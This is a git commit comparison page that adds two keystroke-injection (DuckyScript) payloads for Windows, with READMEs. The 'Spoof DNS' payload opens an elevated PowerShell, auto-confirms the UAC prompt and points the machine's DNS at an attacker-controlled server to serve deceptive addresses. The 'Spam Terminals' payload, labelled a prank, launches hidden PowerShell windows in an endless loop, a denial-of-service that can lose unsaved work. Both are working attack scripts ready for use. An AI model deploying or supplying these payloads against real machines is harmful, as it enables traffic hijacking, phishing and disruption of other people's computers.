Compare commits
5 Commits
d31f994848
...
c58b930f58
Author | SHA1 | Date |
---|---|---|
Aleff | c58b930f58 | |
Peaks | 5f13d6090f | |
Luu | 1a1c79d5ba | |
Luu | 203d986ae4 | |
Aleff | 47fa68ecd9 |
|
@ -0,0 +1,27 @@
|
||||||
|
# Spoof DNS - Windows ✅
|
||||||
|
|
||||||
|
DNS Spoofer
|
||||||
|
|
||||||
|
## Description
|
||||||
|
|
||||||
|
A payload used to alter the machine’s DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
|
||||||
|
|
||||||
|
### Settings
|
||||||
|
|
||||||
|
* Set the primary and secondary dns servers
|
||||||
|
|
||||||
|
## Credits
|
||||||
|
|
||||||
|
<h2 align="center"> Luu176 </h2>
|
||||||
|
<div align=center>
|
||||||
|
<table>
|
||||||
|
<tr>
|
||||||
|
<td align="center" width="96">
|
||||||
|
<a href="https://github.com/luu176">
|
||||||
|
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
|
||||||
|
</a>
|
||||||
|
<br>Github
|
||||||
|
</td>
|
||||||
|
</tr>
|
||||||
|
</table>
|
||||||
|
</div>
|
|
@ -0,0 +1,69 @@
|
||||||
|
REM Title: DNS changer
|
||||||
|
REM Author: luu176
|
||||||
|
REM Description: Changes DNS address of windows machine in powershell
|
||||||
|
REM Target: Windows 10/11
|
||||||
|
|
||||||
|
REM wifi interface should be named: Wi-Fi
|
||||||
|
DEFINE #interface Ethernet
|
||||||
|
DEFINE #primaryDNS 192.168.1.3
|
||||||
|
DEFINE #secondaryDNS 1.1.1.1
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
SAVE_HOST_KEYBOARD_LOCK_STATE
|
||||||
|
GUI r
|
||||||
|
DELAY 150
|
||||||
|
STRINGLN powershell Start-Process powershell -Verb runAs
|
||||||
|
DELAY 800
|
||||||
|
ALT y
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
|
||||||
|
REM below is to blink the LED when payload done
|
||||||
|
VAR $i = 0
|
||||||
|
WHILE ( $i < 9 )
|
||||||
|
DELAY 150
|
||||||
|
CAPSLOCK
|
||||||
|
$i = ( $i + 1 )
|
||||||
|
END_WHILE
|
||||||
|
RESTORE_HOST_KEYBOARD_LOCK_STATE
|
|
@ -0,0 +1,23 @@
|
||||||
|
# Windows Spam Terminals
|
||||||
|
|
||||||
|
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
|
||||||
|
|
||||||
|
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
|
||||||
|
|
||||||
|
### Details
|
||||||
|
|
||||||
|
- **Title**: Windows Spam Terminals
|
||||||
|
- **Author**: bst04 - Aleff
|
||||||
|
- **Version**: 1.0
|
||||||
|
- **Category**: Prank
|
||||||
|
- **Target**: Windows
|
||||||
|
|
||||||
|
### Dependencies
|
||||||
|
|
||||||
|
This payload is plug and play <3
|
||||||
|
|
||||||
|
## How It Works 📜
|
||||||
|
|
||||||
|
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
|
||||||
|
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals
|
||||||
|
|
|
@ -0,0 +1,58 @@
|
||||||
|
REM_BLOCK
|
||||||
|
############################################
|
||||||
|
# #
|
||||||
|
# Title : Windows Spam Terminals #
|
||||||
|
# Author : bst04 - Aleff #
|
||||||
|
# Version : 1.0 #
|
||||||
|
# Category : Prank #
|
||||||
|
# Target : Windows #
|
||||||
|
# #
|
||||||
|
############################################
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||||
|
REM VERSION 1.1
|
||||||
|
REM AUTHOR: Korben
|
||||||
|
|
||||||
|
REM_BLOCK DOCUMENTATION
|
||||||
|
Windows fully passive OS Detection and passive Detect Ready
|
||||||
|
Includes its own passive detect ready.
|
||||||
|
Does not require additional extensions.
|
||||||
|
|
||||||
|
USAGE:
|
||||||
|
Extension runs inline (here)
|
||||||
|
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
|
||||||
|
boot delay
|
||||||
|
$_OS will be set to WINDOWS or NOT_WINDOWS
|
||||||
|
See end of payload for usage within payload
|
||||||
|
END_REM
|
||||||
|
|
||||||
|
REM CONFIGURATION:
|
||||||
|
DEFINE #MAX_WAIT 150
|
||||||
|
DEFINE #CHECK_INTERVAL 20
|
||||||
|
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
|
||||||
|
DEFINE #NOT_WINDOWS 7
|
||||||
|
|
||||||
|
$_OS = #NOT_WINDOWS
|
||||||
|
|
||||||
|
VAR $MAX_TRIES = #MAX_WAIT
|
||||||
|
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
|
||||||
|
DELAY #CHECK_INTERVAL
|
||||||
|
$MAX_TRIES = ($MAX_TRIES - 1)
|
||||||
|
END_WHILE
|
||||||
|
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
|
||||||
|
$_OS = WINDOWS
|
||||||
|
END_IF
|
||||||
|
|
||||||
|
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
|
||||||
|
IF ($_OS == WINDOWS) THEN
|
||||||
|
STRING HELLO WINDOWS!
|
||||||
|
ELSE
|
||||||
|
STRING HELLO WORLD!
|
||||||
|
END_IF
|
||||||
|
END_REM
|
||||||
|
END_EXTENSION
|
||||||
|
|
||||||
|
GUI r
|
||||||
|
DELAY 500
|
||||||
|
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"
|
Loading…
Reference in New Issue